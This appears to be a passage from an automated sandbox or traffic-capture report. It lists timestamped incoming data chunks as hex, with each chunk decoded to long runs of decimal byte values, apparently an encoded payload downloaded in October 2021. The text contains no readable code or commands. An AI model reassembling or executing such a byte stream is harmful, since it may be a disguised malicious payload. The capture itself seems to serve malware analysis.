                    2021-10-26 16:59:17 UTC156INData Raw: 20 35 33 20 31 30 34 20 31 32 35 20 31 36 31 20 38 39 20 33 35 20 32 31 32 20 32 31 34 20 38 39 20 31 36 39 20 31 36 39 20 32 30 30 20 36 36 20 36 39 20 31 30 32 20 31 33 30 20 32 34 20 39 31 20 32 30 20 32 30 35 20 32 31 34 20 32 31 36 20 32 31 35 20 33 38 20 31 39 33 20 32 31 33 20 31 37 36 20 31 31 35 20 36 33 20 31 38 39 20 31 35 34 20 37 20 31 36 20 32 32 20 32 31 34 20 38 37 20 32 32 36 20 31 39 36 20 31 36 37 20 31 33 38 20 37 30 20 39 34 20 39 38 20 31 31 34 20 31 33 37 20 32 34 37 20 39 36 20 31 34 30 20 31 33 31 20 31 30 32 20 31 34 20 32 33 37 20 36 31 20 39 33 20 32 35 35 20 39 38 20 31 33 32 20 34 32 20 32 33 20 36 35 20 34 30 20 31 39 30 20 32 30 20 31 38 30 20 31 35 33 20 31 35 32 20 31 36 31 20 32 30 33 20 31 31 33 20 31 34 33 20 31 34 35
                    Data Ascii: 53 104 125 161 89 35 212 214 89 169 169 200 66 69 102 130 24 91 20 205 214 216 215 38 193 213 176 115 63 189 154 7 16 22 214 87 226 196 167 138 70 94 98 114 137 247 96 140 131 102 14 237 61 93 255 98 132 42 23 65 40 190 20 180 153 152 161 203 113 143 145
                    2021-10-26 16:59:17 UTC159INData Raw: 30 36 20 31 36 31 20 32 30 39 20 31 20 32 36 20 31 32 36 20 32 32 32 20 31 38 39 20 32 34 33 20 34 37 20 35 31 20 38 38 20 31 38 39 20 32 31 38 20 31 34 35 20 31 35 31 20 34 32 20 32 34 31 20 32 34 34 20 31 34 38 20 31 38 39 20 31 32 35 20 37 34 20 32 32 30 20 31 34 30 20 39 20 30 20 31 31 32 20 39 31 20 33 38 20 38 33 20 31 34 38 20 31 31 36 20 32 31 35 20 31 34 36 20 32 31 38 20 38 34 20 34 38 20 33 38 20 33 39 20 35 30 20 35 31 20 34 38 20 35 31 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 32 34 20 35 30 20 34 38 20 35 30 20 36 34 20 31 30 32 20 39 32 20 36 39 20 36 37 20 36 39 20 32 20 37 20 30 20 31 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 37 20 35 30 20 39 32 20 35 30 20 35 34 20 38 34 20 32 31 34 20 34 38 20 31 30 39 20
                    Data Ascii: 06 161 209 1 26 126 222 189 243 47 51 88 189 218 145 151 42 241 244 148 189 125 74 220 140 9 0 112 91 38 83 148 116 215 146 218 84 48 38 39 50 51 48 51 54 84 114 117 109 124 50 48 50 64 102 92 69 67 69 2 7 0 1 84 114 117 109 117 50 92 50 54 84 214 48 109
                    2021-10-26 16:59:17 UTC164INData Raw: 37 20 31 32 31 20 31 31 35 20 31 30 39 20 31 39 37 20 35 37 20 36 35 20 35 37 20 34 38 20 38 34 20 31 38 30 20 31 32 36 20 32 38 20 31 32 33 20 35 32 20 34 38 20 32 33 37 20 36 31 20 33 37 20 31 32 31 20 31 31 35 20 31 30 39 20 31 33 30 20 35 37 20 36 35 20 35 37 20 34 38 20 38 34 20 31 31 32 20 31 32 31 20 32 38 20 31 32 33 20 35 32 20 34 38 20 33 39 20 35 38 20 31 32 34 20 31 32 36 20 31 31 35 20 31 30 39 20 35 30 20 36 32 20 32 34 20 36 32 20 34 38 20 38 34 20 33 33 20 31 32 31 20 36 39 20 31 32 34 20 35 32 20 34 38 20 38 34 20 35 38 20 31 32 34 20 31 32 36 20 31 31 35 20 31 30 39 20 36 20 36 32 20 32 34 20 36 32 20 34 38 20 38 34 20 32 34 35 20 31 32 31 20 35 32 20 31 31 32 20 35 32 20 34 38 20 31 38 38 20 35 38 20 31 33 20 31 31 34 20 31 31 35 20 31
                    Data Ascii: 7 121 115 109 197 57 65 57 48 84 180 126 28 123 52 48 237 61 37 121 115 109 130 57 65 57 48 84 112 121 28 123 52 48 39 58 124 126 115 109 50 62 24 62 48 84 33 121 69 124 52 48 84 58 124 126 115 109 6 62 24 62 48 84 245 121 52 112 52 48 188 58 13 114 115 1
                    2021-10-26 16:59:17 UTC168INData Raw: 20 31 30 39 20 31 31 32 20 35 39 20 35 31 20 31 34 30 20 35 34 20 31 35 33 20 31 31 35 20 31 32 36 20 31 30 38 20 31 31 32 20 35 30 20 31 37 35 20 34 32 20 35 34 20 38 34 20 31 32 33 20 31 31 38 20 31 37 33 20 31 31 32 20 32 35 35 20 34 39 20 35 31 20 35 34 20 38 34 20 31 31 34 20 32 32 30 20 31 31 37 20 31 31 32 20 35 30 20 31 37 20 34 39 20 32 35 34 20 38 34 20 31 39 31 20 31 31 36 20 31 30 38 20 31 31 33 20 35 30 20 34 38 20 31 33 36 20 34 36 20 38 34 20 31 31 34 20 31 31 36 20 31 30 38 20 31 38 34 20 35 30 20 32 32 35 20 35 31 20 35 35 20 38 35 20 31 31 34 20 31 31 37 20 31 37 31 20 31 30 34 20 35 30 20 34 38 20 35 31 20 35 35 20 31 35 32 20 31 31 34 20 31 36 34 20 31 30 38 20 31 31 33 20 35 31 20 34 38 20 35 30 20 32 32 38 20 37 36 20 31 31 34 20 31
                    Data Ascii: 109 112 59 51 140 54 153 115 126 108 112 50 175 42 54 84 123 118 173 112 255 49 51 54 84 114 220 117 112 50 17 49 254 84 191 116 108 113 50 48 136 46 84 114 116 108 184 50 225 51 55 85 114 117 171 104 50 48 51 55 152 114 164 108 113 51 48 50 228 76 114 1
                    2021-10-26 16:59:17 UTC172INData Raw: 20 31 31 34 20 31 32 38 20 32 30 31 20 32 34 37 20 35 31 20 35 34 20 33 34 20 33 39 20 32 34 31 20 38 31 20 31 31 34 20 31 30 37 20 31 31 32 20 33 31 20 31 34 39 20 31 35 33 20 35 33 20 38 32 20 31 31 34 20 36 30 20 32 30 30 20 31 38 30 20 35 30 20 35 34 20 35 30 20 38 33 20 32 34 31 20 31 30 38 20 31 31 33 20 31 30 37 20 31 31 32 20 31 37 39 20 31 34 39 20 34 34 20 35 30 20 38 32 20 31 31 34 20 32 33 32 20 32 30 30 20 32 34 37 20 35 31 20 35 34 20 35 30 20 31 34 33 20 32 34 31 20 32 34 35 20 31 31 36 20 31 30 37 20 31 31 32 20 32 33 31 20 31 34 39 20 31 38 31 20 35 35 20 38 32 20 31 31 34 20 31 33 32 20 32 30 30 20 38 37 20 35 33 20 35 34 20 35 32 20 37 31 20 36 32 20 35 31 20 31 31 32 20 35 39 20 32 34 30 20 32 33 30 20 33 38 20 38 20 34 39 20 32 20 32
                    Data Ascii: 114 128 201 247 51 54 34 39 241 81 114 107 112 31 149 153 53 82 114 60 200 180 50 54 50 83 241 108 113 107 112 179 149 44 50 82 114 232 200 247 51 54 50 143 241 245 116 107 112 231 149 181 55 82 114 132 200 87 53 54 52 71 62 51 112 59 240 230 38 8 49 2 2
                    2021-10-26 16:59:17 UTC176INData Raw: 31 31 32 20 35 30 20 34 38 20 35 32 20 35 34 20 31 30 34 20 39 32 20 38 38 20 31 30 38 20 35 32 20 35 30 20 31 30 38 20 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 31 32 20 37 30 20 33 30 20 38 35 20 35 34 20 31 37 20 31 31 34 20 32 32 35 20 38 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 34 38 20 38 34 20 32 32 36 20 39 31 20 31 30 20 31 31 32 20 31 31 39 20 34 38 20 32 35 30 20 32 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 33 20 35 30 20 31 35 36 20 32 38 20 31 37 31 20 38 35 20 35 35 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 39 20 35 34 20 38 32 20 31 30 36 20 31 33 34 20 31 31 39 20 31 35 38 20 35 30 20 31 31 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 31 31 36 20 35
                    Data Ascii: 112 50 48 52 54 104 92 88 108 52 50 108 6 54 84 114 117 107 112 70 30 85 54 17 114 225 89 112 50 48 50 48 84 226 91 10 112 119 48 250 2 84 114 117 109 113 50 156 28 171 85 55 117 109 112 50 48 49 54 82 106 134 119 158 50 118 50 54 84 114 117 110 112 116 5
                    2021-10-26 16:59:17 UTC180INData Raw: 32 20 31 33 38 20 31 31 30 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 30 30 20 31 30 39 20 31 34 35 20 31 32 32 20 32 33 31 20 34 38 20 37 34 20 38 34 20 36 32 20 34 32 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 33 35 20 35 34 20 32 39 20 35 39 20 32 30 37 20 31 30 39 20 31 34 20 35 30 20 37 32 20 38 32 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 32 33 20 31 31 32 20 31 35 35 20 31 32 31 20 31 33 36 20 35 34 20 34 33 20 31 31 34 20 38 39 20 31 32 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 39 20 38 34 20 31 33 35 20 36 30 20 31 37 38 20 31 31 34 20 31 37 38 20 34 38 20 37 34 20 38 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 31 30 39 20 31 32 30 20 32 33 33 20 38 36 20 32 34 30 20 31 31 37 20 36 35 20 31 38 20 35 30 20
                    Data Ascii: 2 138 110 50 54 84 114 100 109 145 122 231 48 74 84 62 42 109 112 50 48 35 54 29 59 207 109 14 50 72 82 54 84 114 117 123 112 155 121 136 54 43 114 89 12 112 50 48 50 39 84 135 60 178 114 178 48 74 87 84 114 117 109 102 50 109 120 233 86 240 117 65 18 50
                    2021-10-26 16:59:17 UTC184INData Raw: 20 31 36 33 20 34 38 20 32 33 20 38 31 20 31 31 34 20 31 31 38 20 31 33 38 20 31 30 39 20 31 34 30 20 37 33 20 34 38 20 35 30 20 36 32 20 38 34 20 32 32 35 20 31 31 37 20 31 33 36 20 32 33 20 32 39 20 35 32 20 34 38 20 35 35 20 38 34 20 32 34 30 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 38 32 20 34 32 20 31 39 37 20 37 38 20 37 35 20 31 31 33 20 31 31 30 20 31 31 33 20 36 20 31 37 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 32 34 33 20 31 30 39 20 31 37 37 20 39 30 20 31 31 32 20 35 34 20 35 30 20 38 35 20 33 34 20 32 34 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 38 30 20 35 34 20 31 36 35 20 32 36 20 35 31 20 31 30 35 20 31 31 36 20 35 31 20 31 36 30 20 31 37 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 32 33 35 20 31 31 32 20 31 39
                    Data Ascii: 163 48 23 81 114 118 138 109 140 73 48 50 62 84 225 117 136 23 29 52 48 55 84 240 117 109 112 50 182 42 197 78 75 113 110 113 6 178 50 54 84 114 243 109 177 90 112 54 50 85 34 247 109 112 50 48 180 54 165 26 51 105 116 51 160 176 54 84 114 117 235 112 19
                    2021-10-26 16:59:17 UTC188INData Raw: 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 36 39 20 31 37 38 20 31 30 20 38 36 20 37 31 20 31 31 36 20 31 33 20 32 31 36 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 32 30 38 20 32 33 37 20 37 36 20 34 38 20 35 20 35 31 20 32 34 36 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 35 20 34 38 20 32 33 31 20 31 38 32 20 31 31 33 20 31 31 39 20 36 34 20 31 30 38 20 31 32 34 20 31 35 35 20 34 38 20 35 30 20 35 34 20 38 34 20 39 39 20 31 31 37 20 31 30 34 20 32 34 31 20 32 35 20 35 33 20 37 20 35 35 20 31 36 20 32 31 39 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 33 38 20 35 30 20 38 33 20 32 31 33 20 36 34 20 31 31 32 20 39 31 20 31 31 33 20 31 39 30 20 31 35 33 20 35 30 20 35 34 20 38 34 20 31 31 34 20 39 39 20 31 30
                    Data Ascii: 117 109 102 50 69 178 10 86 71 116 13 216 50 48 50 54 66 114 208 237 76 48 5 51 246 252 114 117 109 112 35 48 231 182 113 119 64 108 124 155 48 50 54 84 99 117 104 241 25 53 7 55 16 219 117 109 112 50 38 50 83 213 64 112 91 113 190 153 50 54 84 114 99 10
                    2021-10-26 16:59:17 UTC191INData Raw: 31 34 20 32 39 20 32 34 38 20 32 33 20 35 30 20 38 33 20 35 31 20 31 35 34 20 32 32 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 32 20 34 38 20 31 38 32 20 31 36 33 20 31 31 35 20 31 31 35 20 32 32 20 31 30 38 20 30 20 31 33 32 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 35 20 31 31 37 20 31 38 31 20 32 32 39 20 32 31 20 34 39 20 38 37 20 35 35 20 32 34 20 31 39 37 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 31 38 20 31 39 34 20 35 30 20 31 31 35 20 31 30 20 31 31 33 20 35 30 20 31 33 36 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 36 20 31 30 39 20 31 38 30 20 31 36 34 20 31 32 32 20 35 32 20 39 32 20 38 35 20 31 37 30 20 32 30 35 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 31 20 35 34 20 37 36 20 32 32 39 20
                    Data Ascii: 14 29 248 23 50 83 51 154 225 114 117 109 112 52 48 182 163 115 115 22 108 0 132 48 50 54 84 115 117 181 229 21 49 87 55 24 197 117 109 112 50 49 50 118 194 50 115 10 113 50 136 50 54 84 114 116 109 180 164 122 52 92 85 170 205 109 112 50 48 51 54 76 229
                    2021-10-26 16:59:17 UTC196INData Raw: 34 20 38 35 20 31 31 34 20 31 33 20 36 34 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 33 34 20 31 32 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 35 34 20 33 30 20 35 30 20 35 34 20 38 35 20 31 31 34 20 34 35 20 36 37 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 35 34 20 31 32 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 31 34 20 33 30 20 35 30 20 35 34 20 38 36 20 31 31 34 20 31 31 37 20 36 36 20 31 31 32 20 35 30 20 34 39 20 35 30 20 34 32 20 31 32 33 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 30 20 33 31 20 35 30 20 35 34 20 38 37 20 31 31 34 20 32 39 20 36 36 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 37 34 20 31 32 33 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 35 30 20 33 31 20 35 30 20 35 34 20 38 35 20
                    Data Ascii: 4 85 114 13 64 112 50 49 50 134 121 114 117 108 112 54 30 50 54 85 114 45 67 112 50 49 50 254 122 114 117 108 112 214 30 50 54 86 114 117 66 112 50 49 50 42 123 114 117 111 112 10 31 50 54 87 114 29 66 112 50 49 50 174 123 114 117 108 112 250 31 50 54 85
                    2021-10-26 16:59:17 UTC200INData Raw: 20 35 34 20 38 35 20 31 31 34 20 32 30 38 20 30 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 33 20 35 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 39 35 20 39 34 20 35 30 20 35 34 20 38 36 20 31 31 34 20 32 35 32 20 33 20 31 31 32 20 35 30 20 35 31 20 35 30 20 31 34 37 20 35 38 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 32 20 32 34 33 20 39 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 32 30 20 32 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 31 31 20 35 39 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 32 37 20 36 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 34 30 20 32 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 35 31 20 33 36 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 34 33 20 36 34 20 35 30 20 35 34 20 38 35 20 31
                    Data Ascii: 54 85 114 208 0 112 50 49 50 23 58 114 117 108 112 95 94 50 54 86 114 252 3 112 50 51 50 147 58 114 117 105 112 243 94 50 54 85 114 120 2 112 50 49 50 111 59 114 117 108 112 127 64 50 54 85 114 240 29 112 50 49 50 151 36 114 117 111 112 143 64 50 54 85 1
                    2021-10-26 16:59:17 UTC204INData Raw: 34 20 31 32 20 31 30 38 20 31 33 31 20 34 30 20 31 30 37 20 35 33 20 31 37 35 20 38 34 20 32 32 37 20 38 34 20 31 33 37 20 31 31 32 20 31 37 31 20 34 38 20 31 37 33 20 32 33 20 31 37 36 20 31 31 34 20 32 33 36 20 31 30 39 20 31 39 34 20 31 39 20 32 31 37 20 35 30 20 31 35 39 20 38 34 20 34 39 20 38 32 20 38 34 20 31 31 33 20 31 35 35 20 34 38 20 39 39 20 31 37 20 38 31 20 31 31 35 20 32 32 30 20 31 30 39 20 37 20 32 31 20 31 33 20 35 31 20 31 35 39 20 38 34 20 32 33 36 20 38 32 20 31 30 20 31 31 32 20 31 34 37 20 35 31 20 31 39 33 20 34 34 20 35 31 20 31 31 34 20 32 32 30 20 31 30 39 20 32 31 37 20 32 31 20 31 31 34 20 35 31 20 31 35 39 20 38 34 20 31 32 30 20 39 33 20 31 30 34 20 31 31 33 20 31 35 35 20 34 38 20 31 20 33 30 20 35 31 20 31 31 34 20 32 30
                    Data Ascii: 4 12 108 131 40 107 53 175 84 227 84 137 112 171 48 173 23 176 114 236 109 194 19 217 50 159 84 49 82 84 113 155 48 99 17 81 115 220 109 7 21 13 51 159 84 236 82 10 112 147 51 193 44 51 114 220 109 217 21 114 51 159 84 120 93 104 113 155 48 1 30 51 114 20
                    2021-10-26 16:59:17 UTC208INData Raw: 20 32 34 34 20 31 31 31 20 31 38 20 31 35 38 20 31 37 32 20 35 30 20 31 38 33 20 38 36 20 33 30 20 32 31 37 20 33 39 20 31 31 36 20 31 33 31 20 35 31 20 36 38 20 31 35 34 20 37 32 20 31 32 37 20 31 35 36 20 31 30 39 20 32 35 31 20 31 35 38 20 31 38 20 36 33 20 37 31 20 38 36 20 32 32 36 20 32 31 37 20 31 39 38 20 31 31 35 20 36 37 20 35 30 20 31 36 37 20 31 35 34 20 31 38 20 31 32 37 20 34 20 31 30 35 20 32 35 31 20 31 35 38 20 31 32 34 20 36 33 20 31 33 35 20 38 37 20 32 31 31 20 32 31 37 20 35 31 20 31 32 35 20 39 31 20 35 32 20 31 32 30 20 31 35 37 20 32 34 32 20 31 31 34 20 35 32 20 31 31 31 20 31 33 31 20 34 30 20 35 33 20 35 31 20 31 31 39 20 38 36 20 31 39 39 20 32 31 37 20 31 34 37 20 31 32 30 20 35 39 20 35 33 20 31 39 33 20 34 34 20 33 38 20 31
                    Data Ascii: 244 111 18 158 172 50 183 86 30 217 39 116 131 51 68 154 72 127 156 109 251 158 18 63 71 86 226 217 198 115 67 50 167 154 18 127 4 105 251 158 124 63 135 87 211 217 51 125 91 52 120 157 242 114 52 111 131 40 53 51 119 86 199 217 147 120 59 53 193 44 38 1
                    2021-10-26 16:59:17 UTC212INData Raw: 32 20 31 34 38 20 31 31 31 20 39 39 20 31 33 31 20 35 35 20 35 34 20 31 37 35 20 38 36 20 31 32 39 20 31 31 31 20 31 38 32 20 39 38 20 31 37 31 20 35 30 20 31 32 38 20 31 35 36 20 35 33 20 31 31 36 20 32 34 34 20 31 31 31 20 31 30 39 20 31 33 31 20 39 20 35 31 20 31 37 35 20 38 36 20 31 34 30 20 32 32 33 20 31 35 32 20 31 32 32 20 31 37 39 20 35 30 20 36 34 20 31 33 34 20 38 31 20 39 37 20 35 32 20 31 31 31 20 31 33 31 20 34 30 20 38 39 20 35 32 20 31 38 33 20 38 36 20 39 31 20 31 39 36 20 31 30 30 20 39 39 20 31 37 39 20 35 30 20 30 20 31 33 35 20 32 34 32 20 31 31 34 20 34 34 20 31 30 34 20 37 37 20 31 33 31 20 36 31 20 33 33 20 31 38 33 20 38 36 20 35 39 20 31 39 36 20 31 32 37 20 39 39 20 31 37 39 20 35 30 20 31 30 33 20 31 33 35 20 30 20 39 38 20 32
                    Data Ascii: 2 148 111 99 131 55 54 175 86 129 111 182 98 171 50 128 156 53 116 244 111 109 131 9 51 175 86 140 223 152 122 179 50 64 134 81 97 52 111 131 40 89 52 183 86 91 196 100 99 179 50 0 135 242 114 44 104 77 131 61 33 183 86 59 196 127 99 179 50 103 135 0 98 2
                    2021-10-26 16:59:17 UTC223INData Raw: 20 31 20 32 35 20 32 20 39 31 20 38 32 20 37 31 20 36 36 20 34 39 20 31 31 34 20 33 38 20 32 30 20 33 20 37 30 20 38 35 20 39 35 20 32 34 20 32 33 20 32 39 20 31 37 20 38 20 35 32 20 39 33 20 39 33 20 32 38 20 31 31 37 20 35 39 20 33 31 20 35 20 34 20 32 38 20 38 37 20 36 36 20 35 30 20 31 31 34 20 36 31 20 31 37 20 31 20 34 20 33 31 20 39 32 20 38 31 20 36 34 20 37 39 20 35 32 20 36 34 20 31 31 37 20 36 32 20 39 20 36 35 20 36 38 20 38 37 20 39 31 20 31 32 32 20 34 39 20 32 36 20 31 20 32 38 20 38 37 20 38 33 20 37 30 20 39 35 20 35 39 20 32 38 20 36 20 36 37 20 35 35 20 38 37 20 39 34 20 38 37 20 36 38 20 36 31 20 31 37 20 31 31 37 20 34 30 20 33 30 20 37 31 20 39 33 20 38 37 20 36 38 20 35 33 20 36 20 32 36 20 33 31 20 31 31 32 20 31 32 33 20 31 31 37
                    Data Ascii: 1 25 2 91 82 71 66 49 114 38 20 3 70 85 95 24 23 29 17 8 52 93 93 28 117 59 31 5 4 28 87 66 50 114 61 17 1 4 31 92 81 64 79 52 64 117 62 9 65 68 87 91 122 49 26 1 28 87 83 70 95 59 28 6 67 55 87 94 87 68 61 17 117 40 30 71 93 87 68 53 6 26 31 112 123 117
                    2021-10-26 16:59:17 UTC239INData Raw: 20 31 31 35 20 39 39 20 34 38 20 36 37 20 36 39 20 35 37 20 32 33 20 36 37 20 39 31 20 39 34 20 37 20 31 31 32 20 35 37 20 36 34 20 31 30 20 34 32 20 37 32 20 39 20 31 30 37 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 31 37 20 31 31 20 31 32 30 20 31 32 35 20 39 31 20 37 20 30 20 36 32 20 39 30 20 32 39 20 38 38 20 36 38 20 33 20 31 30 38 20 34 34 20 33 36 20 33 39 20 33 20 31 39 20 31 31 33 20 38 37 20 31 31 36 20 38 39 20 33 30 20 33 39 20 35 32 20 39 31 20 36 32 20 31 20 31 31 36 20 39 35 20 31 31 36 20 31 30 31 20 33 32 20 32 32 20 37 33 20 34 31 20 31 30 33 20 38 36 20 38 31 20 31 30 31 20 33 31 20 36 33 20 37 32 20 31 30 39 20 38 33 20 31 35 20 36 35 20 38 39 20 39 37 20 31 20 32 34 20 35 32 20 32 20 34 39 20 31 30 39 20 36 20 36 34 20 34 20 31
                    Data Ascii: 115 99 48 67 69 57 23 67 91 94 7 112 57 64 10 42 72 9 107 11 84 81 72 28 17 11 120 125 91 7 0 62 90 29 88 68 3 108 44 36 39 3 19 113 87 116 89 30 39 52 91 62 1 116 95 116 101 32 22 73 41 103 86 81 101 31 63 72 109 83 15 65 89 97 1 24 52 2 49 109 6 64 4 1
                    2021-10-26 16:59:17 UTC255INData Raw: 20 36 39 20 31 33 20 31 35 20 35 34 20 31 31 39 20 37 39 20 34 20 38 20 36 39 20 36 37 20 36 36 20 31 30 31 20 38 37 20 35 35 20 33 35 20 34 35 20 34 32 20 36 20 31 31 20 38 37 20 32 20 31 30 32 20 39 37 20 35 34 20 34 32 20 30 20 33 34 20 37 31 20 39 37 20 31 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 32 33 20 39 37 20 31 32 30 20 36 37 20 31 32 31 20 31 31 20 35 37 20 35 37 20 33 37 20 33 34 20 31 31 35 20 39 38 20 31 31 36 20 38 31 20 39 39 20 36 36 20 33 38 20 34 32 20 33 30 20 31 30 39 20 31 32 35 20 36 39 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 35 20 31 32 37 20 30 20 30 20 33 20 31 37 20 37 36 20 33 35 20 37 32 20 36 20 35 20 38 39 20 39 34 20 35 33 20 33 36 20 36 38 20 33 36 20 32 38 20 38 35 20 31 30 36 20 31 31 37 20
                    Data Ascii: 69 13 15 54 119 79 4 8 69 67 66 101 87 55 35 45 42 6 11 87 2 102 97 54 42 0 34 71 97 15 11 84 81 72 28 23 97 120 67 121 11 57 57 37 34 115 98 116 81 99 66 38 42 30 109 125 69 11 105 114 86 80 1 5 127 0 0 3 17 76 35 72 6 5 89 94 53 36 68 36 28 85 106 117
                    2021-10-26 16:59:17 UTC271INData Raw: 39 33 20 34 20 31 30 32 20 31 33 20 36 31 20 36 31 20 39 30 20 36 32 20 31 32 35 20 31 32 34 20 31 30 33 20 38 31 20 31 30 35 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 31 32 32 20 36 37 20 39 33 20 36 32 20 32 20 37 36 20 31 30 20 37 33 20 34 20 37 33 20 39 33 20 37 38 20 33 36 20 36 30 20 33 38 20 39 35 20 35 33 20 32 32 20 31 31 34 20 31 31 33 20 36 20 31 30 30 20 35 32 20 36 32 20 31 20 32 31 20 37 30 20 39 35 20 35 20 38 32 20 31 34 20 32 30 20 35 39 20 38 34 20 36 32 20 37 20 39 33 20 37 30 20 31 32 32 20 31 36 20 35 32 20 36 35 20 31 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 31 33 20 37 20 36 31 20 35 36 20 32 36 20 39 32 20 37 33 20 39 36 20 31 31 31 20 32 38 20 34 30 20 34 20 34 36 20 32 37 20 31 32 31 20 31 31 33 20 37 30 20 36
                    Data Ascii: 93 4 102 13 61 61 90 62 125 124 103 81 105 79 117 78 77 67 122 67 93 62 2 76 10 73 4 73 93 78 36 60 38 95 53 22 114 113 6 100 52 62 1 21 70 95 5 82 14 20 59 84 62 7 93 70 122 16 52 65 10 77 50 19 15 71 13 7 61 56 26 92 73 96 111 28 40 4 46 27 121 113 70 6
                    2021-10-26 16:59:17 UTC287INData Raw: 32 20 38 33 20 31 31 36 20 36 35 20 31 30 35 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 38 33 20 31 31 38 20 38 31 20 31 37 20 36 39 20 35 20 30 20 33 33 20 36 38 20 36 20 39 32 20 39 35 20 36 31 20 30 20 36 32 20 32 31 20 35 34 20 39 36 20 31 32 35 20 38 38 20 31 20 35 20 37 39 20 37 32 20 31 30 39 20 38 33 20 31 35 20 36 35 20 38 36 20 36 35 20 39 37 20 33 35 20 35 35 20 32 20 34 30 20 31 30 36 20 38 20 31 31 36 20 31 30 30 20 31 30 30 20 36 32 20 37 20 36 20 32 36 20 39 30 20 31 30 33 20 31 32 34 20 35 20 33 37 20 35 20 37 32 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 31 32 34 20 31 30 38 20 31 36 20 35 36 20 33 38 20 35 31 20 37 32 20 37 34 20 39 34 20 39 30 20 34 20 35 34 20 32 33 20 33 39 20 35 37 20 38 34 20 39 36 20 39 37 20 38 39
                    Data Ascii: 2 83 116 65 105 79 117 78 77 67 83 118 81 17 69 5 0 33 68 6 92 95 61 0 62 21 54 96 125 88 1 5 79 72 109 83 15 65 86 65 97 35 55 2 40 106 8 116 100 100 62 7 6 26 90 103 124 5 37 5 72 80 112 17 13 67 124 108 16 56 38 51 72 74 94 90 4 54 23 39 57 84 96 97 89
                    2021-10-26 16:59:17 UTC303INData Raw: 35 35 20 36 30 20 31 31 38 20 36 38 20 31 32 36 20 39 37 20 34 38 20 33 39 20 35 38 20 33 35 20 34 31 20 36 20 31 31 34 20 31 30 39 20 38 31 20 31 20 34 35 20 33 31 20 37 20 35 38 20 39 31 20 34 20 31 31 32 20 38 31 20 31 38 20 35 31 20 35 39 20 31 34 20 33 34 20 31 32 36 20 39 36 20 31 32 37 20 36 37 20 33 20 37 20 33 36 20 33 36 20 36 32 20 38 36 20 39 38 20 31 32 36 20 38 35 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 36 35 20 31 20 38 33 20 31 31 36 20 39 38 20 37 31 20 35 30 20 39 31 20 38 34 20 38 30 20 39 36 20 39 31 20 37 20 31 31 32 20 31 37 20 31 37 20 33 34 20 32 20 31 30 36 20 39 31 20 31 31 33 20 31 31 39 20 31 30 35 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 36 20 31 31 36 20 31 31 30 20 31 31 32 20 35 36 20 33 39 20 36 31 20
                    Data Ascii: 55 60 118 68 126 97 48 39 58 35 41 6 114 109 81 1 45 31 7 58 91 4 112 81 18 51 59 14 34 126 96 127 67 3 7 36 36 62 86 98 126 85 105 114 86 80 1 65 1 83 116 98 71 50 91 84 80 96 91 7 112 17 17 34 2 106 91 113 119 105 79 117 78 77 67 6 116 110 112 56 39 61
